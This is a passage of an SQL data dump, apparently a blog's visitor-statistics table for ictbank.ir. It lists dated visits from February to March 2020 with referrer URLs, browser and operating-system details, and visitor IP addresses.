(111,'2020-02-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.208.94','000',0,1,0),
(112,'2020-02-13','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','172.27.248.182','000',0,2,0),
(113,'2020-02-13','http://ictbank.ir/blog','Safari','iOS','13.3.1',NULL,NULL,'','89.199.8.134','000',0,1,0),
(114,'2020-02-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(115,'2020-02-13','http://ictbank.ir/blog','Safari','iOS','12.4.1',NULL,NULL,'','5.117.246.31','000',0,1,0),
(116,'2020-02-13','https://www.linkedin.com/','Unknown','iOS','13.3.1',NULL,NULL,'','217.23.3.96','000',0,1,0),
(117,'2020-02-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','213.248.148.169','000',0,1,0),
(118,'2020-02-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.57.40.38','000',0,3,0),
(119,'2020-02-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.16.50.184','000',0,11,0),
(120,'2020-02-14','https://www.linkedin.com/','Unknown','iOS','13.3.1',NULL,NULL,'','5.78.194.10','000',0,1,0),
(121,'2020-02-14','http://82.102.9.14:80','Internet Explorer','Windows','6.1',NULL,NULL,'','221.231.126.2','000',0,1,0),
(122,'2020-02-14','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.52.33.51','000',0,2,0),
(123,'2020-02-14','http://ictbank.ir/blog/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','Safari','iOS','13.3.1',NULL,NULL,'','217.23.3.96','000',0,5,0),
(124,'2020-02-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.11.77.12','000',0,1,0),
(125,'2020-02-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(126,'2020-02-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,4,0),
(127,'2020-02-14','http://design-arena.ir/blog/','Chrome','Windows','6.2',NULL,NULL,'','82.102.9.14','000',0,4,0),
(128,'2020-02-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.110.40','000',0,1,0),
(129,'2020-02-14','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','178.62.82.141','000',0,1,0),
(130,'2020-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,2,0),
(131,'2020-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','85.90.247.110','000',0,1,0),
(132,'2020-02-15','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.40.191.115','000',0,3,0),
(133,'2020-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.21.68','000',0,1,0),
(134,'2020-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','86.185.206.44','000',0,1,0),
(135,'2020-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.101.27','000',0,1,0),
(136,'2020-02-15','http://design-arena.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','167.172.192.43','000',0,1,0),
(137,'2020-02-15','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.103.242','000',0,1,0),
(138,'2020-02-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','94.100.28.107','000',0,1,0),
(139,'2020-02-15','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','142.93.145.204','000',0,1,0),
(140,'2020-02-15','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','138.197.160.158','000',0,1,0),
(141,'2020-02-16','https://google.com/search?p=1671788813274&gags=13','Firefox','Windows','22.2',NULL,NULL,'','45.114.116.102','000',0,1,0),
(142,'2020-02-16','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','39.107.72.78','000',0,2,0),
(143,'2020-02-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.38','000',0,1,0),
(144,'2020-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.218.250.178','000',0,1,0),
(145,'2020-02-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.143.220.94','000',0,1,0),
(146,'2020-02-16','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.131','000',0,1,0),
(147,'2020-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.163.251','000',0,1,0),
(148,'2020-02-16','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.25','000',0,1,0),
(149,'2020-02-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.239.183','000',0,1,0),
(150,'2020-02-17','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.26.68','000',0,1,0),
(151,'2020-02-17','http://www.design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.118.223','000',0,2,0),
(152,'2020-02-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.117','000',0,1,0),
(153,'2020-02-17','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','136.144.137.66','000',0,1,0),
(154,'2020-02-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','216.144.254.138','000',0,1,0),
(155,'2020-02-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.67.109','000',0,1,0),
(156,'2020-02-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(157,'2020-02-17','android-app://com.linkedin.android','Chrome','Android','6.0',NULL,NULL,'','5.113.107.168','000',0,1,0),
(158,'2020-02-17','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.235.198.78','000',0,2,0),
(159,'2020-02-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','145.220.15.203','000',0,1,0),
(160,'2020-02-17','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','182.138.163.59','000',0,1,0),
(161,'2020-02-18','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','205.185.117.108','000',0,1,0),
(162,'2020-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.64.156.81','000',0,4,0),
(163,'2020-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.7.147.1','000',0,1,0),
(164,'2020-02-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.57.40.38','000',0,2,0),
(165,'2020-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.252.207','000',0,1,0),
(166,'2020-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.176.152','000',0,1,0),
(167,'2020-02-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','216.144.254.138','000',0,1,0),
(168,'2020-02-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','111.224.235.249','000',0,1,0),
(169,'2020-02-18','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','37.49.231.159','000',0,1,0),
(170,'2020-02-18','http://ictbank.ir/blog','Firefox Mobile','Android','7.0',NULL,NULL,'','87.236.212.185','000',0,1,0),
(171,'2020-02-18','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','123.245.27.130','000',0,1,0),
(172,'2020-02-19','http://82.102.9.14/','Sogou Explorer','Windows','6.1',NULL,NULL,'','45.131.176.108','000',0,1,0),
(173,'2020-02-19','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.232.15.34','000',0,3,0),
(174,'2020-02-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.194.177','000',0,1,0),
(175,'2020-02-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.76.229','000',0,1,0),
(176,'2020-02-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,2,0),
(177,'2020-02-19','android-app://com.linkedin.android','Chrome','Android','6.0',NULL,NULL,'','5.117.183.144','000',0,1,0),
(178,'2020-02-19','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','203.44.88.146','000',0,3,0),
(179,'2020-02-19','http://design-arena.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','193.9.114.221','000',0,1,0),
(180,'2020-02-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,3,0),
(181,'2020-02-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(182,'2020-02-20','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','62.112.9.237','000',0,1,0),
(183,'2020-02-20','android-app://com.linkedin.android','Chrome','Android','6.0',NULL,NULL,'','5.115.80.110','000',0,1,0),
(184,'2020-02-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(185,'2020-02-20','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','5.123.217.210','000',0,2,0),
(186,'2020-02-20','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','181.215.218.112','000',0,1,0),
(187,'2020-02-20','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(188,'2020-02-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.181.160','000',0,1,0),
(189,'2020-02-20','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','203.195.221.231','000',0,2,0),
(190,'2020-02-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(191,'2020-02-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.27.189.68','000',0,1,0),
(192,'2020-02-20','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','182.88.232.2','000',0,1,0),
(193,'2020-02-20','http://ictbank.ir/blog','Firefox','OS X','10.9',NULL,NULL,'','212.156.55.158','000',0,1,0),
(194,'2020-02-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','171.120.159.197','000',0,1,0),
(195,'2020-02-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.213.130','000',0,1,0),
(196,'2020-02-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.43.29.65','000',0,1,0),
(197,'2020-02-21','android-app://com.linkedin.android','Chrome','Android','6.0',NULL,NULL,'','5.115.106.213','000',0,1,0),
(198,'2020-02-21','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','106.75.251.241','000',0,1,0),
(199,'2020-02-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(200,'2020-02-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(201,'2020-02-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(202,'2020-02-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.165.200','000',0,1,0),
(203,'2020-02-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.187.178.53','000',0,2,0),
(204,'2020-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.146.18','000',0,1,0),
(205,'2020-02-22','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','39.135.1.160','000',0,2,0),
(206,'2020-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.37.110','000',0,1,0),
(207,'2020-02-22','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','222.161.37.89','000',0,1,0),
(208,'2020-02-22','http://design-arena.ir/blog','Opera','Windows','6.1',NULL,NULL,'','83.249.83.136','000',0,1,0),
(209,'2020-02-23','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.103.242','000',0,1,0),
(210,'2020-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.26.45.214','000',0,1,0),
(211,'2020-02-23','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','222.161.37.89','000',0,3,0),
(212,'2020-02-23','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.52.254','000',0,1,0),
(213,'2020-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','125.119.10.75','000',0,1,0),
(214,'2020-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.53.41','000',0,1,0),
(215,'2020-02-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.6','000',0,1,0),
(216,'2020-02-24','http://ictbank.ir/blog/','Edge','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,1,0),
(217,'2020-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,1,0),
(218,'2020-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.70.82','000',0,1,0),
(219,'2020-02-24','http://www.ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.89.228.207','000',0,2,0),
(220,'2020-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.241.193','000',0,1,0),
(221,'2020-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.251.102.229','000',0,1,0),
(222,'2020-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.162.94.239','000',0,1,0),
(223,'2020-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,2,0),
(224,'2020-02-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','159.203.24.107','000',0,2,0),
(225,'2020-02-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','142.93.157.50','000',0,1,0),
(226,'2020-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.69.186.23','000',0,1,0),
(227,'2020-02-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(228,'2020-02-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.226','000',0,1,0),
(229,'2020-02-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','35.164.233.96','000',0,1,0),
(230,'2020-02-25','http://ictbank.ir/blog','Samsung Internet','Android','10',NULL,NULL,'','172.27.249.6','000',0,2,0),
(231,'2020-02-25','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','67.213.90.30','000',0,1,0),
(232,'2020-02-25','https://www.linkedin.com/','Unknown','iOS','11.0.3',NULL,NULL,'','5.113.30.113','000',0,1,0),
(233,'2020-02-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','35.165.104.246','000',0,1,0),
(234,'2020-02-25','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','159.203.93.122','000',0,1,0),
(235,'2020-02-25','https://www.linkedin.com/','Unknown','iOS','13.3.1',NULL,NULL,'','176.67.86.146','000',0,1,0),
(236,'2020-02-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','108.171.210.130','000',0,2,0),
(237,'2020-02-26','android-app://com.linkedin.android','Chrome','Android','10',NULL,NULL,'','66.249.81.209','000',0,1,0),
(238,'2020-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.176.84.29','000',0,1,0),
(239,'2020-02-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(240,'2020-02-26','https://l.instagram.com/','Instagram','Android','10',NULL,NULL,'','5.208.181.77','000',0,1,0),
(241,'2020-02-26','http://ictbank.ir/blog','Instagram','iOS','13.3.1',NULL,NULL,'','8.18.50.42','000',0,2,0),
(242,'2020-02-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','212.16.74.245','000',0,3,0),
(243,'2020-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.34.240.231','000',0,1,0),
(244,'2020-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.213.217','000',0,1,0),
(245,'2020-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,1,0),
(246,'2020-02-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(247,'2020-02-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.78.139','000',0,1,0),
(248,'2020-02-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.120.243','000',0,1,0),
(249,'2020-02-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(250,'2020-02-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.73.164.234','000',0,3,0),
(251,'2020-02-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(252,'2020-02-27','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,1,0),
(253,'2020-02-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.101.242.155','000',0,1,0),
(254,'2020-02-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.199.23','000',0,1,0),
(255,'2020-02-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','37.120.156.22','000',0,2,0),
(256,'2020-02-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.83.207.97','000',0,1,0),
(257,'2020-02-28','http://www.design-arena.ir/blog/','Opera','Windows','10.0',NULL,NULL,'','195.154.181.60','000',0,9,0),
(258,'2020-02-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.234','000',0,3,0),
(259,'2020-02-28','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','37.59.87.81','000',0,2,0),
(260,'2020-02-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.169.136','000',0,1,0),
(261,'2020-02-28','http://ictbank.ir/blog','Samsung Internet','Android','10',NULL,NULL,'','172.27.248.39','000',0,1,0),
(262,'2020-02-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.104.118','000',0,1,0),
(263,'2020-02-28','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.211.141.242','000',0,3,0),
(264,'2020-02-28','https://www.linkedin.com/','Unknown','iOS','13.3.1',NULL,NULL,'','185.107.95.229','000',0,1,0),
(265,'2020-02-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,1,0),
(266,'2020-02-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','162.244.225.30','000',0,1,0),
(267,'2020-02-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.73.164.234','000',0,2,0),
(268,'2020-02-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','66.151.211.170','000',0,1,0),
(269,'2020-02-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','93.174.95.106','000',0,1,0),
(270,'2020-02-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.228.69','000',0,1,0),
(271,'2020-02-29','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.131','000',0,1,0),
(272,'2020-03-01','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.211.46.153','000',0,2,0),
(273,'2020-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.204.151','000',0,1,0),
(274,'2020-03-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.249.93.193','000',0,1,0),
(275,'2020-03-01','http://ictbank.ir/blog','Chrome','Android','6.0.1',NULL,NULL,'','66.249.93.195','000',0,2,0),
(276,'2020-03-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.249.93.197','000',0,1,0),
(277,'2020-03-01','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.68.152.26','000',0,1,0),
(278,'2020-03-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(279,'2020-03-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.102.6.177','000',0,2,0),
(280,'2020-03-01','http://ictbank.ir/blog','Chrome','Android','6.0.1',NULL,NULL,'','66.249.81.211','000',0,2,0),
(281,'2020-03-01','http://ictbank.ir/blog','Chrome','Android','6.0.1',NULL,NULL,'','66.249.81.207','000',0,1,0),
(282,'2020-03-01','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','46.101.9.216','000',0,7,0),
(283,'2020-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.73.164.234','000',0,8,0),
(284,'2020-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.0.4','000',0,1,0),
(285,'2020-03-01','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(286,'2020-03-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.42','000',0,1,0),
(287,'2020-03-01','http://www.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.154.47.2','000',0,1,0),
(288,'2020-03-02','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','121.229.3.216','000',0,1,0),
(289,'2020-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.148.103.169','000',0,1,0),
(290,'2020-03-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.50','000',0,1,0),
(291,'2020-03-02','https://www.linkedin.com/','Unknown','iOS','10.3.3',NULL,NULL,'','86.55.127.159','000',0,1,0),
(292,'2020-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.58.82','000',0,1,0),
(293,'2020-03-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','94.102.49.193','000',0,1,0),
(294,'2020-03-03','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.103.242','000',0,1,0),
(295,'2020-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.70.161','000',0,1,0),
(296,'2020-03-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','122.51.26.167','000',0,2,0),
(297,'2020-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.18.19','000',0,1,0),
(298,'2020-03-03','http://www.design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.36.113.142','000',0,1,0),
(299,'2020-03-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(300,'2020-03-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','114.67.73.11','000',0,2,0),
(301,'2020-03-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','134.175.245.162','000',0,2,0),
(302,'2020-03-03','android-app://com.linkedin.android','Chrome','Android','8.0.0',NULL,NULL,'','185.177.229.103','000',0,4,0),
(303,'2020-03-04','http://design-arena.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','72.4.143.111','000',0,1,0),
(304,'2020-03-04','http://ictbank.ir/blog','Chrome','Android','9',NULL,NULL,'','46.245.67.153','000',0,1,0),
(305,'2020-03-04','http://82.102.9.14:80/blog','Safari','iOS','6.0',NULL,NULL,'','85.238.107.122','000',0,1,0),
(306,'2020-03-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','109.108.70.169','000',0,1,0),
(307,'2020-03-04','http://ictbank.ir/blog','Samsung Internet','Android','9',NULL,NULL,'','192.40.57.235','000',0,1,0),
(308,'2020-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.234.13','000',0,1,0),
(309,'2020-03-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','51.15.124.39','000',0,1,0),
(310,'2020-03-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','66.151.211.170','000',0,1,0),
(311,'2020-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.89.189','000',0,1,0),
(312,'2020-03-04','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','51.178.20.143','000',0,3,0),
(313,'2020-03-04','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','185.71.154.175','000',0,1,0),
(314,'2020-03-04','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','119.23.211.54','000',0,1,0),
(315,'2020-03-04','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,2,0),
(316,'2020-03-05','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','194.124.52.52','000',0,1,0),
(317,'2020-03-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','119.39.47.35','000',0,1,0),
(318,'2020-03-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.82.65.234','000',0,1,0),
(319,'2020-03-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','109.120.151.30','000',0,1,0),
(320,'2020-03-05','http://ictbank.ir/blog','Chrome','OS X','10.8.2',NULL,NULL,'','212.156.55.158','000',0,1,0),
(321,'2020-03-05','http://recommended.megathings.com/?f=15&i=0&h=1','Internet Explorer','Windows','6.3',NULL,NULL,'','66.42.58.121','000',0,1,0),
(322,'2020-03-05','http://ictbank.ir/blog','Safari','iOS','13.3.1',NULL,NULL,'','31.13.115.15','000',0,1,0),
(323,'2020-03-05','http://ictbank.ir/blog','Safari','iOS','13.3.1',NULL,NULL,'','31.13.115.20','000',0,1,0),
(324,'2020-03-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.46.151','000',0,1,0),
(325,'2020-03-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.38.28.229','000',0,1,0),
(326,'2020-03-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','66.151.211.170','000',0,1,0),
(327,'2020-03-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','65.132.59.34','000',0,1,0),
(328,'2020-03-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','124.235.138.78','000',0,1,0),
(329,'2020-03-05','http://ictbank.ir/blog','Safari','OS X','10.12.6',NULL,NULL,'','99.232.61.211','000',0,3,0),
(330,'2020-03-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','51.158.190.214','000',0,1,0),
(331,'2020-03-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(332,'2020-03-06','http://example.com/blog','Unknown','Unknown','Unknown',NULL,NULL,'','69.162.80.182','000',0,1,0),
(333,'2020-03-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(334,'2020-03-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','141.98.10.136','000',0,2,0),
(335,'2020-03-06','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','103.82.235.2','000',0,1,0),
(336,'2020-03-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.100.87.249','000',0,1,0),
(337,'2020-03-06','https://www.google.com/','Chrome','OS X','10.14.3',NULL,NULL,'','151.106.11.184','000',0,12,0),
(338,'2020-03-06','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','192.3.215.211','000',0,2,0),
(339,'2020-03-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(340,'2020-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.53.78.136','000',0,1,0),
(341,'2020-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.47.78','000',0,1,0),
